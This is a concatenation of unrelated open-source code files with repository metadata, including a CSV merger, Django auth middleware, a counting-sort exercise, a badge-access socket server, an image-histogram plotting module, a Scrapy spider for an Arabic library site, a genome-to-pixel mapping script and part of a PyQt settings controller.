path = r'/Users/gonzalovaldenebro/Library/CloudStorage/OneDrive-DrakeUniversity/STAT 190/Project 1/Data/Fault_Codes_Time_Series/merged_csv.csv'
all_files = glob.glob(path + "/*.csv")
column_names = ['Turbine', 'Time', 'Date', 'error_id', 'status_code', 'error_message', 'error_category']
list = []
for filename in all_files:
df = pd.read_csv(filename, header=None, names=column_names)
list.append(df)
frame = pd.concat(list, axis=0, ignore_index=True)
frame.to_csv('merged_csv.csv', index=False)
| meetkpatel20/Stat-190-Project-1 | csv_merger/setColumn_names.py | setColumn_names.py | py | 545 | python | en | code | 1 | github-code | 36 |
39804054613 |
import os
from django.urls import resolve, reverse
from django.shortcuts import redirect
from django.http import HttpResponseForbidden
from internal_users.models import InternalUser
from firebase_auth_app.models import FirebaseUser
from customer_users.models import CustomerUser
class InternalUserMiddleware:
# Define apps that need to pass through the middleware check
PROTECTED_APPS = ['talents', 'apis',
'dashboard', 'admin', 'talent_management',] # 'appointments'
# login_url = reverse('internal_users:internal_user_login')
def __init__(self, get_response):
self.get_response = get_response
self.employee_login_url = reverse('internal_users:internal_user_login')
self.customer_login_url = reverse('customer_users:customer_user_login')
def __call__(self, request):
# Resolve the current app name
current_app = resolve(request.path_info).app_name
print(
F'The current_app name is {current_app}. url requeted is {request.path}. is_authenticated?:{request.user.is_authenticated}.')
# print(request.path, request.user.is_authenticated)
# If the user is trying to access the login page itself, bypass further checks
if request.path == self.employee_login_url or request.path == self.customer_login_url:
return self.get_response(request)
# Check if the request path resolves to any of the protected apps
if current_app in self.PROTECTED_APPS:
print(
f'url visit to protected app(s). Implementing custom rules in InternalUserMiddleware...')
if not request.user.is_authenticated or (request.user.is_authenticated and not isinstance(request.user, InternalUser)):
print('incorrect redirecting to the employee login url...')
return redirect(self.employee_login_url)
# # Additional check for CustomerUser when visiting the customer_users app
# if current_app in ['customer_users'] and (not request.user.is_authenticated or (request.user.is_authenticated and not isinstance(request.user, CustomerUser))):
# # Redirect to the customer user login
# print('redirecting to the customer login url...')
# return redirect(self.customer_login_url)
return self.get_response(request)
# the future used multiple user model authentication middleware; designed used with firebase auth
class MultipleUserModelMiddleware:
def __init__(self, get_response):
self.get_response = get_response
def __call__(self, request):
if 'uid' in request.session:
uid = request.session['uid']
firebase_user = None
specific_user = None
try:
firebase_user = FirebaseUser.objects.get(uid=uid)
except FirebaseUser.DoesNotExist:
pass
if firebase_user:
# Set base user
request.firebase_user = firebase_user
# Check each model to find the specific user
for user_model in [CustomerUser, InternalUser]:
try:
specific_user = user_model.objects.get(
firebase_user=firebase_user)
break
except user_model.DoesNotExist:
continue
if specific_user:
request.user = specific_user
response = self.get_response(request)
return response
| zjgcainiao/new_place_at_76 | internal_users/middlewares.py | middlewares.py | py | 3,585 | python | en | code | 0 | github-code | 36 |
37000757290 | T = int(input())
for tc in range(1, T+1):
N = int(input()) # 1 4 7 8 0
number_list = list(map(int, input().split()))
count_list = [0] * (max(number_list)+1) #최댓값보다 1개 큰 값
sort_list = [0] * len(number_list)
for num in number_list:
count_list[num] += 1
#count_list = [1, 1, 0, 0, 1, 0, 0, 1, 1]
for i in range(1, len(count_list)):
count_list[i] = count_list[i] + count_list[i-1]
#count_list = [1, 2, 2, 2, 3, 3, 3, 4, 5]
for i in range(len(sort_list)-1, -1, -1):
count_list[number_list[i]] -= 1 #인덱스값 맞춰주기 위해
#number_list 내에 있는 값만 호출 됨
sort_list[count_list[number_list[i]]] = number_list[i]
#sort_list 내 알맞는 위치에 해당 number값 넣기
# [0, 2, 2, 2, 3, 3, 3, 4, 5]
# [0, 0, 0, 0, 0]
# [0, 2, 2, 2, 3, 3, 3, 4, 4]
# [0, 0, 0, 0, 8]
# [0, 2, 2, 2, 3, 3, 3, 3, 4]
# [0, 0, 0, 7, 8]
# [0, 2, 2, 2, 2, 3, 3, 3, 4]
# [0, 0, 4, 7, 8]
# [0, 1, 2, 2, 2, 3, 3, 3, 4]
# [0, 1, 4, 7, 8]
print(f'#{tc}', end=' ')
for num in sort_list:
print(num, end=' ')
print('')
| ejuun/SWEA | swea0202_1966.py | swea0202_1966.py | py | 1,216 | python | en | code | 0 | github-code | 36 |
37716628062 | # Module Imports
import mariadb
import sys
import socket
import threading
import time
# Connect to MariaDB Platform
try:
db = mariadb.connect(
user="user",
password="password",
host="mariadb",
port=3306,
database="info801"
)
except mariadb.Error as e:
print(f"Error connecting to MariaDB Platform: {e}")
sys.exit(1)
# Get Cursor
cur = db.cursor()
HEADER = 64
SERVER = socket.gethostbyname(socket.gethostname())
PORT = 5050
ADDR = (SERVER,PORT)
FORMAT = 'utf-8'
DISCONNECT_MESSAGE = "!DISCONNECT"
server = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
server.bind(ADDR)
def getBatimentByName(bat):
cur.execute(
"SELECT id FROM batiment WHERE nom=? LIMIT 1",
(bat,))
def getPersonneByBadge(badge):
cur.execute(
"SELECT id FROM personne WHERE numero_badge=? LIMIT 1",
(badge,))
def verify(idBat,idPer):
cur.execute(
"SELECT COUNT(*) FROM personne_batiment WHERE batiment_id=? AND personne_id=?",
(idBat,idPer))
def insertHistory(personne_id,batiment_id):
cur.execute(
"INSERT INTO history (personne_id,batiment_id) VALUES (?, ?)",
(personne_id, batiment_id))
db.commit()
print(f"Last Inserted ID: {cur.lastrowid}")
def handle_client(conn, addr):
print(f"[NEW CONNECTION] {addr} connected.")
connected = True
while connected:
msg_length = conn.recv(HEADER).decode(FORMAT)
if msg_length:
msg_length = int(msg_length)
msg = conn.recv(msg_length).decode(FORMAT)
msg = msg.split(',')
print(msg)
if msg == DISCONNECT_MESSAGE:
connected = False
if(msg[0] == "batiment"):
msg.pop(0)
getBatimentByName(msg[0])
msg.pop(0)
(idBat,) = cur.fetchone()
print(f"id bat: {idBat}")
#remove scanCarte
msg.pop(0)
getPersonneByBadge(msg[0])
(idPer,) = cur.fetchone()
print(f"id bat: {idPer}")
msg.pop(0)
cur.fetchall()
verify(idBat,idPer)
(ver,) = cur.fetchone()
if ver==0:
msg = "status,lumiereRouge"
message = msg.encode(FORMAT)
msg_length = len(message)
send_length = str(msg_length).encode(FORMAT)
send_length += b' ' * (HEADER - len(send_length))
conn.send(send_length)
conn.send(message)
insertHistory(idPer,idBat)
else:
msg = "status,lumiereVerte"
message = msg.encode(FORMAT)
msg_length = len(message)
send_length = str(msg_length).encode(FORMAT)
send_length += b' ' * (HEADER - len(send_length))
conn.send(send_length)
conn.send(message)
insertHistory(idPer,idBat)
conn.close()
def start():
server.listen()
print(f"[LISTENING] Server is listening on {SERVER}")
while True:
conn, addr = server.accept()
thread = threading.Thread(target=handle_client, args=(conn, addr))
thread.start()
print(f"[ACTIVE CONNECTIONS] {threading.activeCount() - 1}")
print("[STARTING] server is starting...")
start() | visarsylejmani/architecture-logicielle-info801 | server/server.py | server.py | py | 3,523 | python | en | code | 0 | github-code | 36 |
5668667396 | from __future__ import absolute_import
from __future__ import division
from __future__ import unicode_literals
import matplotlib.pyplot as plt
import numpy as np
import pandas as pd
import seaborn as sns
from matplotlib.offsetbox import OffsetImage, AnnotationBbox
from PIL import Image as pil_image
from mosaic import data_utils
from mosaic import contexts
from mosaic import image_io
from mosaic import features
from mosaic import plots
__all__ = ['image_histogram']
def images_to_histogram(images, x, n_bins=None, sort_by=None):
"""Create an image histogram.
Parameters
----------
images : listof PIL Images.
Images to display in the image histogram. All images must be
the same shape.
x : np.array of shape [n_samples,]
The variable whose histogram is displayed.
n_bins : int or None, optional
Specification of the number of bins. If None, then the
Freedman-Diaconis estimator is used to determine the number of bins.
sort_by : np.array of shape [n_samples,], optional
Data or name of the variable to sort images by on the y-axis.
Returns
-------
A properly shaped width x height x 3 PIL Image.
"""
n_bins = n_bins if n_bins is not None else 'fd'
hist, bin_edges = np.histogram(x, bins=n_bins)
n_bins = hist.shape[0]
bin_max = hist.max()
width, height = images[0].size
px_w = width * n_bins
px_h = height * bin_max
#background_color = (50, 50, 50)
background_color = (255, 255, 255)
canvas = pil_image.new('RGB', (px_w, px_h), background_color)
thumbnail_px = (width, height)
for bin_idx, edge in enumerate(zip(bin_edges, bin_edges[1:])):
edge_mask = (x >= edge[0]) & (x < edge[1])
tmp_sort = sort_by[edge_mask]
tmp = [images[index] for index in np.where(edge_mask)[0]]
# sort y values if present
if sort_by is not None:
tmp = [tmp[index] for index in np.argsort(tmp_sort)[::-1]]
y_coord = px_h
x_coord = width * bin_idx
for thumbnail in tmp:
canvas.paste(thumbnail, (x_coord, y_coord))
y_coord -= height
return canvas
def histogram_matplotlib(images, x, n_bins=None, sort_by=None, **kwargs):
fig, ax = plt.subplots(**kwargs)
n_bins = n_bins if n_bins is not None else 'fd'
hist, bin_edges = np.histogram(x, bins=n_bins)
n_bins = hist.shape[0]
bin_max = hist.max()
y_max = 0
for bin_idx, edge in enumerate(zip(bin_edges, bin_edges[1:])):
img_height = abs(edge[1] - edge[0])
edge_mask = (x >= edge[0]) & (x < edge[1])
bin_images = images[edge_mask]
# sort y values if present
if sort_by is not None:
bin_sort = sort_by[edge_mask]
bin_images = bin_images[np.argsort(bin_sort)]
left, right = edge
for i, img in enumerate(bin_images):
bottom = img_height * i
top = bottom + img_height
plots.imshow(img, extent=[left, right, bottom, top], interpolation='lanczos')
if top > y_max:
y_max = top
ax.set_xlim(bin_edges[0], bin_edges[-1])
ax.set_ylim(0, y_max)
ax.yaxis.set_visible(False)
return sns.despine(ax=ax, left=True)
def image_histogram(x,
images=None,
data=None,
n_bins=None,
sort_by=features.HSVFeatures.SATURATION,
image_dir='',
image_size=None,
n_jobs=1,
**kwargs):
"""Create an univariate image histogram binned by the `x`
variable.
Parameters
----------
x : str or array-like of shape [n_samples,]
Data or names of variables in `data`.
images : str or array-like of shape [n_samples, width, height, channels], optional
Image array or name of the variable containing the image file
paths within `data`.
data : pandas.DataFrame, optional
Tidy ("long-form") dataframe where each column is a variable
and each row is an observation. If `images`, `x`, or `sort_by`
is a variable name, then it should be contained in `data`.
n_bins : int or None
Specification of the number of bins. If None, then the
Freedman-Diaconis estimator is used to determine the number of bins.
sort_by : str, HSVFeatures enum or array-like of shape [n_samples,], optional
Data or name of the variable to sort images by on the y-axis.
image_dir : str (default='')
The location of the image files on disk.
image_size : int
The size of each image in the scatter plot.
n_jobs : int (default=1)
The number of parallel workers to use for loading
the image files.
Returns
-------
ax : matplotlib Axes
Returns the Axes object with the plot for further tweaking.
Examples
--------
Create an image histogram.
.. plot:: ../examples/image_histogram.py
"""
images = data_utils.get_images(
data, images,
image_dir=image_dir,
image_size=image_size,
index=None,#x.index,
as_image=False,
n_jobs=n_jobs)
x = data_utils.get_variable(data, x)
if sort_by is not None:
if sort_by in features.HSVFeatures.all_features():
hsv = features.extract_hsv_stats(images, n_jobs=n_jobs)
sort_by = hsv[:, features.HSVFeatures.feature_index(sort_by)]
else:
sort_by = data_utils.get_variable(data, sort_by)
#histo = images_to_histogram(images, x, n_bins=n_bins, sort_by=sort_by)
#return plots.pillow_to_matplotlib(histo, **kwargs)
return histogram_matplotlib(images, x, n_bins=n_bins, sort_by=sort_by, **kwargs)
| joshloyal/Mosaic | mosaic/histogram.py | histogram.py | py | 5,809 | python | en | code | 0 | github-code | 36 |
74797071465 | import scrapy
from scrapy.spiders import CrawlSpider, Rule
from scrapy.http import Request
import re
class MySpider(CrawlSpider):
name = 'author_scrape'
author_name = 'الكندي يعقوب'
author_eng = 'al-Kindi'
start_urls = ['https://ablibrary.net/books/?offset=0&limit=50&author={}&sort=name,asc'.format(author_name)]#start url from here, need to parse the json dict.
def parse(self, response):
author_data = response.body.decode()
books_ptrn = re.compile(r'"(author":.+?id":(\d+?),.+?"name":" (.+?)".+?"volume":"(.+?)"})',
re.DOTALL | re.MULTILINE | re.UNICODE)
books = re.findall(books_ptrn, author_data)
for book in books:
bib = book[0]
book_id = book[1]
title = book[2]
all_text = ''
bib_data = {'author': self.author_eng, 'title': title, 'bib data': bib, 'all_text': all_text}
volume = book[3]
if volume != ' ':
bib_data['title'] = bib_data['title']+'v.' + volume
book_url = 'https://ablibrary.net/books/{}/content?fields=content,footnote,description,page_name,' \
'page_number'.format(book_id)
request = Request(book_url, callback=self.parse_book)
request.meta['meta'] = bib_data
yield request
def parse_book(self, response):
bib_data = response.meta['meta']
book_text = response.body.decode()
bib_data['all_text'] = bib_data['all_text'] + '\n' + book_text
self.log('extracted book {}'.format(bib_data['title']))
text_file = open("{}, {}.txt".format(bib_data['title'], self.author_eng), "w", encoding='utf-8')
#bib_data['all_text'] = self.clean_text(bib_data['all_text'])
text_file.write(bib_data['all_text'])
text_file.close()
def clean_text(self, text):
#here will be code that removes from the string "text" the unwanted patterns
return text
| maeirnoam/scrapers | ABLibrary/ablib_scraper/ablib_scraper/spiders/ABLibCrawler.py | ABLibCrawler.py | py | 2,051 | python | en | code | 0 | github-code | 36 |
71798506343 | #!/usr/bin/python
# python images_for_deep_learning_sv02_create_non_white_space_mapping_file.py -i input_bed -o output_mapping_file
# python images_for_deep_learning_sv02_create_non_white_space_mapping_file.py -i non_white_out_all_mgrb_and_isks.txt -o non_white_out_all_mgrb_and_isks_map_350x350.txt
# Sort input bed file by chromosome. It is assumed that positions within chromosome are already sorted.
# Count number of nucleotides in it.
# Map nucleotide positions to a 350 x 350 array.
# Output the mapping.
# This mapping will be used to convert a VCF file to a 350 x 350 image.
# The entire 3 billion nucleotide genome could have been mapped. However, most of it doesn't contain any variants.
# This program reads and maps only those genome positions that have variants.
# Even then, there will be more genomic nucleotides to map to pixels than there are available pixels in a 350 x 350 image.
# This program calculates the nucleotide_to_pixel_ratio and maps or compresses multiple bp into one pixel.
# Mapping file is tab-delimited and has no header. First line is nucleotide_to_pixel_ratio, num_rows, and num_cols for pixel image.
# Columns are chrom, start_pos, end_pos, map_row_start, map_col_start, map_row_end, map_col_end
# 14214 350 350
# 1 843216 843248 1 1 1 1
# 1 869460 870342 1 1 1 1
# 1 884041 884110 1 1 1 1
# ...
# Y 22661495 22661520 350 52 350 52
# Y 24417006 24417026 350 52 350 52
# Y 28787561 28802853 350 52 350 53
# MT 1 16569 350 53 350 54
__author__ = 'Emma M. Rath'
__copyright__ = 'Copyright 2019, Garvan Institute of Medical Research and Kinghorn Cancer Centre'
import sys
import os
import argparse
import math
######################################################
def is_integer(s):
try:
int(s)
return True
except ValueError:
return False
######################################################
def read_input( in_bed ):
in_chrom = []
in_start = []
in_end = []
infile = open( in_bed, 'r')
for inline in infile:
inline = inline.strip()
if (inline != ''):
infields = inline.split('\t')
in_chrom.append( str(infields[0]) )
in_start.append( int(infields[1]) )
in_end.append( int(infields[2]) )
return in_chrom, in_start, in_end
######################################################
def sort_input( in1_chrom, in1_start, in1_end ):
order_of_chromosomes = ['1','2','3','4','5','6','7','8','9','10','11','12','13','14','15','16','17','18','19','20','21','22','X','Y','MT']
in2_chrom = []
in2_start = []
in2_end = []
for this_chrom in order_of_chromosomes:
for i in range( 0, len(in1_chrom) ):
if (in1_chrom[i] == this_chrom):
in2_chrom.append( in1_chrom[i] )
in2_start.append( in1_start[i] )
in2_end.append( in1_end[i] )
return in2_chrom, in2_start, in2_end
######################################################
def count_nucleotides( in_start, in_end ):
num_nucleotides = 0
for i in range( 0, len(in_start) ):
num_nucleotides = num_nucleotides + in_end[i] - in_start[i] + 1
return num_nucleotides
######################################################
def map_positions_to_pixels( in_chrom, in_start, in_end, num_rows, num_cols, nucleotide_to_pixel_ratio ):
map_row_start = [0] * len(in_chrom)
map_col_start = [0] * len(in_chrom)
map_row_end = [0] * len(in_chrom)
map_col_end = [0] * len(in_chrom)
row_upto = 1
col_upto = 1
for i in range( 0, len(in_chrom)):
chrom = str(in_chrom[i])
start_pos = int(in_start[i])
end_pos = int(in_end[i])
map_row_start[i] = row_upto
map_col_start[i] = col_upto
remaining_unmapped_bp = end_pos - start_pos + 1
remaining_unmapped_pixels = int(remaining_unmapped_bp / nucleotide_to_pixel_ratio)
if (int(remaining_unmapped_bp % nucleotide_to_pixel_ratio) > 0):
remaining_unmapped_pixels = remaining_unmapped_pixels + 1
remaining_cols_in_row = num_cols - col_upto - 1
if (remaining_unmapped_pixels <= remaining_cols_in_row):
map_row_end[i] = row_upto
map_col_end[i] = col_upto + remaining_unmapped_pixels - 1
col_upto = col_upto + remaining_unmapped_pixels - 1
else:
remaining_unmapped_pixels = remaining_unmapped_pixels - remaining_cols_in_row
additional_rows = int(math.ceil( float(remaining_unmapped_pixels) / float(num_cols) ))
map_row_end[i] = row_upto + additional_rows
row_upto = row_upto + additional_rows
additional_cols = int(remaining_unmapped_pixels % num_cols)
if (additional_cols == 0):
col_upto = num_cols
map_col_end[i] = num_cols
else:
col_upto = additional_cols
map_col_end[i] = additional_cols
return map_row_start, map_col_start, map_row_end, map_col_end
######################################################
def write_output_map( out_map, nucleotide_to_pixel_ratio, num_rows, num_cols, in_chrom, in_start, in_end, map_row_start, map_col_start, map_row_end, map_col_end ):
out_map_file = open(out_map, 'w')
outline = str(nucleotide_to_pixel_ratio) + "\t" + str(num_rows) + "\t" + str(num_cols) + "\n"
out_map_file.write( outline )
for i in range( 0, len(in_chrom) ):
outline = str(in_chrom[i]) + "\t" + str(in_start[i]) + "\t" + str(in_end[i]) + "\t" + str(map_row_start[i]) + "\t" + str(map_col_start[i]) + "\t" + str(map_row_end[i]) + "\t" + str(map_col_end[i]) + "\n"
out_map_file.write( outline )
out_map_file.close()
return
######################################################
def main():
parser = argparse.ArgumentParser(description='Read in BED file and sort. Map BED file locations to a 350 x 350 array.')
parser.add_argument('-i', action="store", dest="in_bed", required=True, help='Input BED file')
parser.add_argument('-o', action="store", dest="out_map", required=True, help='Output mapping file')
args = parser.parse_args()
num_rows = 350
num_cols = 350
in1_chrom, in1_start, in1_end = read_input( args.in_bed )
in2_chrom, in2_start, in2_end = sort_input( in1_chrom, in1_start, in1_end )
num_nucleotides = count_nucleotides( in2_start, in2_end )
num_pixels = num_rows * num_cols
nucleotide_to_pixel_ratio = int(num_nucleotides / num_pixels) + 1
map_row_start, map_col_start, map_row_end, map_col_end = map_positions_to_pixels( in2_chrom, in2_start, in2_end, num_rows, num_cols, nucleotide_to_pixel_ratio )
write_output_map( args.out_map, nucleotide_to_pixel_ratio, num_rows, num_cols, in2_chrom, in2_start, in2_end, map_row_start, map_col_start, map_row_end, map_col_end )
if __name__=='__main__':
main()
| emmamrath/gene_annotation_of_structural_variants | create_images_for_deep_learning/images_for_deep_learning_sv02_create_non_white_space_mapping_file.py | images_for_deep_learning_sv02_create_non_white_space_mapping_file.py | py | 6,428 | python | en | code | 1 | github-code | 36 |
26736973424 | import json
import re
from PyQt5.QtGui import QColor
from PyQt5.QtWidgets import QFileDialog, QListWidgetItem, QColorDialog
from models.const import *
from models import util
from uis.main_window import Ui_MainWindow
class SettingsController(object):
def __init__(self, app=None, ui: Ui_MainWindow = None, main_controller=None):
self.app = app
self.ui = ui
self.main_controller = main_controller
self.setup_control()
pass
def setup_control(self):
self.ui.cbx_settings_reader_auto_play_pgb.addItems([TRSM("No"),TRSM("Yes")])
self.ui.cbx_settings_proxy_mode.addItems([TRSM("Disable proxy"),TRSM("Use proxy and not proxy same time"),TRSM("Only use proxy")])
self.ui.cbx_settings_proxy_type.addItems([TRSM("https"),TRSM("http")])
self.ui.cbx_settings_cugan_denoise.addItems([TRSM("No effect"),TRSM("Level 0"),TRSM("Level 1"),TRSM("Level 2"),TRSM("Level 3")])
self.ui.cbx_settings_cugan_resize.addItems([TRSM("No"),TRSM("Yes")])
self.ui.cbx_settings_when_close_window.addItems([TRSM("Minimize to system tray"),TRSM("Close window")])
# UI Display
self.retranslateUi()
self.load_config()
# action
self.ui.btn_settings_save.clicked.connect(self.btn_settings_save_clicked)
self.ui.btn_settings_reset.clicked.connect(self.btn_settings_reset_clicked)
self.ui.btn_settings_general_folder.clicked.connect(self.btn_settings_general_folder_clicked)
self.ui.btn_settings_proxy_add.clicked.connect(self.btn_settings_proxy_add_clicked)
self.ui.btn_settings_proxy_delete.clicked.connect(self.btn_settings_proxy_delete_clicked)
self.ui.btn_settings_cugan_browser.clicked.connect(self.btn_settings_cugan_browser_clicked)
self.ui.btn_settings_reader_background.clicked.connect(self.btn_settings_reader_background_clicked)
self.ui.txt_settings_reader_background.textChanged.connect(self.txt_settings_reader_background_text_changed)
def retranslateUi(self):
self.ui.cbx_settings_reader_auto_play_pgb.setItemText(0,TRSM("No"))
self.ui.cbx_settings_reader_auto_play_pgb.setItemText(1,TRSM("Yes"))
self.ui.cbx_settings_proxy_mode.setItemText(0,TRSM("Disable proxy"))
self.ui.cbx_settings_proxy_mode.setItemText(1,TRSM("Use proxy and not proxy same time"))
self.ui.cbx_settings_proxy_mode.setItemText(2,TRSM("Only use proxy"))
self.ui.cbx_settings_cugan_denoise.setItemText(0,TRSM("No effect"))
self.ui.cbx_settings_cugan_denoise.setItemText(1,TRSM("Level 0"))
self.ui.cbx_settings_cugan_denoise.setItemText(2,TRSM("Level 1"))
self.ui.cbx_settings_cugan_denoise.setItemText(3,TRSM("Level 2"))
self.ui.cbx_settings_cugan_denoise.setItemText(4,TRSM("Level 3"))
self.ui.cbx_settings_cugan_resize.setItemText(0,TRSM("No"))
self.ui.cbx_settings_cugan_resize.setItemText(1,TRSM("Yes"))
self.ui.cbx_settings_when_close_window.setItemText(0,TRSM("Minimize to system tray"))
self.ui.cbx_settings_when_close_window.setItemText(1,TRSM("Close window"))
pass
#action
def btn_settings_general_folder_clicked(self):
old_folder_path = self.ui.txt_settings_general_folder.text()
if old_folder_path == "":
old_folder_path = "./"
folder_path = QFileDialog.getExistingDirectory(self.main_controller,TRSM("Open folder"), old_folder_path)
if folder_path != "":
self.ui.txt_settings_general_folder.setText(folder_path)
pass
def btn_settings_reader_background_clicked(self):
old_color = QColor(self.ui.txt_settings_reader_background.text())
color = QColorDialog.getColor(old_color,self.main_controller,TRSM("Pick a color"))
if color.isValid():
color_name = color.name()
self.ui.txt_settings_reader_background.setText(color_name)
self.ui.lbl_settings_reader_background_preview.setStyleSheet("background-color: "+color_name+";")
def btn_settings_cugan_browser_clicked(self):
old_file_path = self.ui.txt_settings_cugan_location.text()
if old_file_path == "":
old_file_path = "./"
file_path = QFileDialog.getOpenFileName(self.main_controller,TRSM("EXE location"), old_file_path)
if len(file_path) >= 2 and file_path[0] != "":
self.ui.txt_settings_cugan_location.setText(file_path[0])
def btn_settings_proxy_add_clicked(self):
if self.ui.txt_settings_proxy_ip.text() != "":
proxy = self.ui.cbx_settings_proxy_type.currentText() + "://" + self.ui.txt_settings_proxy_ip.text()
if not self.check_proxy_format(proxy):
util.msg_box(TRSM("Please enter a proxy with ip:port format"), self.main_controller)
elif self.check_proxy_exist_in_list(proxy):
util.msg_box(TRSM("Proxy already exist in list"), self.main_controller)
else:
self.try_add_proxy(proxy)
self.ui.txt_settings_proxy_ip.setText("")
else:
util.msg_box(TRSM("Please enter a proxy with ip:port format"),self.main_controller)
pass
def btn_settings_proxy_delete_clicked(self):
if len(self.ui.list_settings_proxy.selectedItems()) > 0:
if util.confirm_box(TRSM("Confirm delete these proxy?"),self.main_controller):
for item in self.ui.list_settings_proxy.selectedItems():
self.ui.list_settings_proxy.takeItem(self.ui.list_settings_proxy.row(item))
else:
util.msg_box(TRSM("Please select at least one proxy"),self.main_controller)
pass
def btn_settings_save_clicked(self):
self.save_config()
def btn_settings_reset_clicked(self):
self.ui.spin_settings_max_retry.setValue(5)
self.ui.spin_settings_timeout.setValue(30)
self.ui.spin_settings_book_padding.setValue(2)
self.ui.spin_settings_chapter_padding.setValue(3)
self.ui.spin_settings_image_padding.setValue(3)
self.ui.spin_settings_jpg_quality.setValue(90)
self.ui.spin_settings_check_is_2_page.setValue(1.0)
self.ui.txt_settings_reader_background.setText("#000000")
self.ui.spin_settings_reader_auto_play_interval.setValue(5.0)
self.ui.cbx_settings_reader_auto_play_pgb.setCurrentIndex(1)
self.ui.spin_settings_reader_page_gap.setValue(0)
self.ui.spin_settings_page_sleep.setValue(10)
self.ui.spin_settings_image_sleep.setValue(1)
self.ui.spin_settings_download_worker.setValue(2)
self.ui.cbx_settings_proxy_mode.setCurrentIndex(0)
self.ui.spin_settings_cugan_scale.setValue(2)
self.ui.cbx_settings_cugan_denoise.setCurrentIndex(4)
self.ui.cbx_settings_cugan_resize.setCurrentIndex(0)
self.ui.cbx_settings_when_close_window.setCurrentIndex(0)
pass
def txt_settings_reader_background_text_changed(self):
color_str = self.ui.txt_settings_reader_background.text()
q_color = QColor(color_str)
if q_color.isValid():
self.ui.lbl_settings_reader_background_preview.setStyleSheet("background-color: " + color_str)
# internal
def load_config(self):
#general
download_folder = MY_CONFIG.get("general", "download_folder")
self.ui.txt_settings_general_folder.setText(download_folder)
max_retry = MY_CONFIG.get("general", "max_retry")
self.ui.spin_settings_max_retry.setValue(int(max_retry))
timeout = MY_CONFIG.get("general", "timeout")
self.ui.spin_settings_timeout.setValue(float(timeout))
self.ui.cbx_settings_user_agent.addItems([
"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:98.0) Gecko/20100101 Firefox/98.0",
"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.60 Safari/537.36",
])
# "Mozilla/5.0 (iPad; CPU OS 8_0_2 like Mac OS X) AppleWebKit/60.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12A405 Safari/600.1.4",
# "Mozilla/5.0 (iPhone; CPU iPhone OS 13_0 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.2 Mobile/15E148 Safari/604.1",
# "Mozilla/5.0 (Linux; Android 12; Pixel 6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.58 Mobile Safari/537.36"
agent = MY_CONFIG.get("general", "agent")
self.ui.cbx_settings_user_agent.setCurrentText(agent)
book_padding = MY_CONFIG.get("general", "book_padding")
self.ui.spin_settings_book_padding.setValue(int(book_padding))
chapter_padding = MY_CONFIG.get("general", "chapter_padding")
self.ui.spin_settings_chapter_padding.setValue(int(chapter_padding))
image_padding = MY_CONFIG.get("general", "image_padding")
self.ui.spin_settings_image_padding.setValue(int(image_padding))
jpg_quality = MY_CONFIG.get("general", "jpg_quality")
self.ui.spin_settings_jpg_quality.setValue(int(jpg_quality))
check_is_2_page = MY_CONFIG.get("general", "check_is_2_page")
self.ui.spin_settings_check_is_2_page.setValue(float(check_is_2_page))
reader_background = MY_CONFIG.get("reader", "background")
self.ui.txt_settings_reader_background.setText(reader_background)
self.ui.lbl_settings_reader_background_preview.setStyleSheet("background-color:"+reader_background+";")
reader_auto_play_interval = MY_CONFIG.get("reader", "auto_play_interval")
self.ui.spin_settings_reader_auto_play_interval.setValue(float(reader_auto_play_interval))
reader_auto_play_pgb = MY_CONFIG.get("reader", "auto_play_pgb")
self.ui.cbx_settings_reader_auto_play_pgb.setCurrentIndex(int(reader_auto_play_pgb))
reader_page_gap = MY_CONFIG.get("reader", "page_gap")
self.ui.spin_settings_reader_page_gap.setValue(int(reader_page_gap))
#anti ban
page_sleep = MY_CONFIG.get("anti-ban", "page_sleep")
self.ui.spin_settings_page_sleep.setValue(float(page_sleep))
image_sleep = MY_CONFIG.get("anti-ban", "image_sleep")
self.ui.spin_settings_image_sleep.setValue(float(image_sleep))
download_worker = MY_CONFIG.get("anti-ban", "download_worker")
self.ui.spin_settings_download_worker.setValue(int(download_worker))
proxy_mode = MY_CONFIG.get("anti-ban", "proxy_mode")
self.ui.cbx_settings_proxy_mode.setCurrentIndex(int(proxy_mode))
proxy_list = MY_CONFIG.get("anti-ban", "proxy_list")
if proxy_list != "":
proxy_list = json.loads(proxy_list)
for proxy in proxy_list:
item = QListWidgetItem()
item.setText(proxy["url"])
item.setFlags(item.flags() | QtCore.Qt.ItemIsUserCheckable)
if proxy["enable"]:
item.setCheckState(QtCore.Qt.Checked)
else:
item.setCheckState(QtCore.Qt.Unchecked)
self.ui.list_settings_proxy.addItem(item)
#real-cugan
exe_location = MY_CONFIG.get("real-cugan", "exe_location")
self.ui.txt_settings_cugan_location.setText(exe_location)
scale = int(MY_CONFIG.get("real-cugan", "scale"))
self.ui.spin_settings_cugan_scale.setValue(scale)
denoise_level = int(MY_CONFIG.get("real-cugan", "denoise_level"))
self.ui.cbx_settings_cugan_denoise.setCurrentIndex(denoise_level+1)
resize = int(MY_CONFIG.get("real-cugan", "resize"))
self.ui.cbx_settings_cugan_resize.setCurrentIndex(resize)
#misc
display_message = MY_CONFIG.get("misc", "display_message")
if display_message == "False":
self.ui.radio_settings_message_no.setChecked(True)
else:
self.ui.radio_settings_message_yes.setChecked(True)
play_sound = MY_CONFIG.get("misc", "play_sound")
if play_sound == "False":
self.ui.radio_settings_sound_no.setChecked(True)
else:
self.ui.radio_settings_sound_yes.setChecked(True)
when_close_window = MY_CONFIG.get("misc", "when_close_window")
self.ui.cbx_settings_when_close_window.setCurrentIndex(int(when_close_window))
pass
def save_config(self):
global WEB_BOT, EXECUTOR
#print("try save")
#general
MY_CONFIG.set("general","download_folder",self.ui.txt_settings_general_folder.text())
MY_CONFIG.set("general","max_retry",str(self.ui.spin_settings_max_retry.value()))
MY_CONFIG.set("general","timeout",str(self.ui.spin_settings_timeout.value()))
MY_CONFIG.set("general","agent",self.ui.cbx_settings_user_agent.currentText())
MY_CONFIG.set("general","book_padding",str(self.ui.spin_settings_book_padding.value()))
MY_CONFIG.set("general","chapter_padding",str(self.ui.spin_settings_chapter_padding.value()))
MY_CONFIG.set("general","image_padding",str(self.ui.spin_settings_image_padding.value()))
MY_CONFIG.set("general","jpg_quality",str(self.ui.spin_settings_jpg_quality.value()))
